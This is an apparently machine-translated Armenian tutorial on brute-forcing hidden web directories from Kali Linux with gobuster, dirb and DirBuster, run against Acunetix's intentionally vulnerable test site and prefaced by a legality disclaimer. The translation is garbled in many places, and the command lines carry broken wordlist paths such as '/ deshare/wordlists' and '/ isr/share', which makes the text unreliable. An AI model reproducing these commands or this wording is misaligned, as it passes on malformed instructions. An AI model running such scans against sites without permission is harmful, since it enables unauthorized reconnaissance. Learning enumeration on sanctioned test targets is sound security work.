Կայքի կատալոգներ Kali Linux- ում
Կայքի կատալոգներ Kali Linux- ում
Դժվար է ասել, թե որն է ավելի լավը: Յուրաքանչյուր ոք ունի իր առավելություններն ու թերությունները.
Bug Bounty- ը դրախտային բույրով բարերի հետ կապ չունի. Սա ծրագիր է, որը կայքի (վեբ ծրագրեր) իրականացնում է IB- ի ոլորտում երրորդ կողմի մասնագետներ `խոցելիորեն փնտրելու համար: Bug Bounty ծրագրին մասնակցելիս անհրաժեշտ է գործել բարոյական եւ հավատարիմ մնալ սահմանված կանոններին: Մի մոռացեք, որ չարտոնված հակերությունն ապօրինի է եւ համարվում է որպես քրեական հանցագործություն: Ոչ Spy -soft.net- ի խմբագիրները, ոչ էլ հեղինակը պատասխանատու չեն ձեր գործողությունների համար.
Խնայող կատալոգներ, օգտագործելով gobuster
Բացեք KALI տերմինալը եւ տեղադրեք GOBUST:
Տեղադրվելուց հետո սկսեք տոիլեսը կամ նույնիսկ ավելի լավը, նայեք վկայականին:
Dem ուցադրման նպատակով ես օգտագործում եմ դիտավորյալ խոցելի փորձարարի .Vulnweb կայքը Acunetix- ից, որը հատուկ նախագծված է այնպիսի բանի համար, ինչպիսին մենք ենք (էթիկական հակերներ)).
Կայքի կատալոգները վտարելու համար մուտքագրեք եւ կատարեք:
Gobuster Dir -u http://testphp.vulnweb.com -w / deshare/wordlists/dirbuster/directory-medium-2.3.txt
Կատարումից հետո ցուցադրվելու են վեբ սերվերի կատալոգները.
Եթե զննարկիչում բացեք գտած կատալոգները, կտեսնեք խոցելի բովանդակություն.
Դա անելու համար կարող եք սկսել կատալոգների եւ ֆայլերի գերբեռնվածությունը, ինչպիսիք են .txt, .css, .js եւ այլն:.
Հրամանատարը կատարելուց հետո կցուցադրվեն միայն նշված ֆայլերի երկարացում ունեցող ֆայլերը.
Բավական կատալոգներ, օգտագործելով Dirb
Հիմա տեսնենք, թե ինչպես գտնել Թաքնված կատալոգներ, օգտագործելով Dirb: Դա անելու համար մուտքագրեք տերմինալ:
Dirb http://testphp.vulnweb.com / isr/share/wordlists/dirb/common.txt
Սկզբունքորեն, բացատրելու բան չկա, եթե դա պարզ չէ, օգտագործեք վկայագիր.
Ուղղորդող կատալոգներ, օգտագործելով DirBuster
Այժմ մենք կօգտագործենք DirBuster - Dirb- ի վարկածը `գրաֆիկական ինտերֆեյս ցուցակագրման կատալոգների ցուցակման համար.
Բացեք KALI Linux դիմումի ընտրացանկը եւ գնացեք —> Վեբ ծրագրերի վերլուծություն —> Որոնել ռոբոտներ եւ կատալոգ Bribbors -> Աշխատող.
Այժմ մուտքագրեք նպատակային կայքի հասցեն, ավելացրեք բառի ցուցակի ֆայլը, եւ ձեզ հարկավոր է ֆայլերի ընդարձակումներ.
Սկսելու կոճակը լրացնելուց եւ սեղմելուց հետո DirBuster- ը կսկսի սկանավորել կայքի գրացուցակը եւ ֆայլերը.
Սա այն է, ինչ արդյունքը կարծես գրացուցակի եւ ֆայլերի ցանկի տեսքով.
Վերը նշված էկրանին ներկայացնում է կատալոգների ցուցակը, որոնք հայտնաբերվել են վեբ սերվերում: Կտտացնելով հատուկ ֆայլի վրա, ցանկալի կլինի, որում կարող եք ընտրել տարբեր գործողություններ, ինչպիսիք են «բաց զննարկիչը», «Պատճենել URL» եւ այլն:.
Այսպես է հայտնաբերվել կատալոգների ցանկը, ծառի կառուցվածքի տեսքով, կարծես.
Ինչպես ցուցակի տեսքով, կարող եք սեղմել աջ կոճակը եւ ցուցադրել լրացուցիչ ընտրացանկ.
Եզրափակում
Սրանք երեք պարզ եւ հաճախ օգտագործվող գործիքներ էին `վեբ ծրագրերի գրացուցակի կատարման համար: Այս ամենը այսօրվա համար է: Տեսեք ձեզ հաջորդ հոդվածում.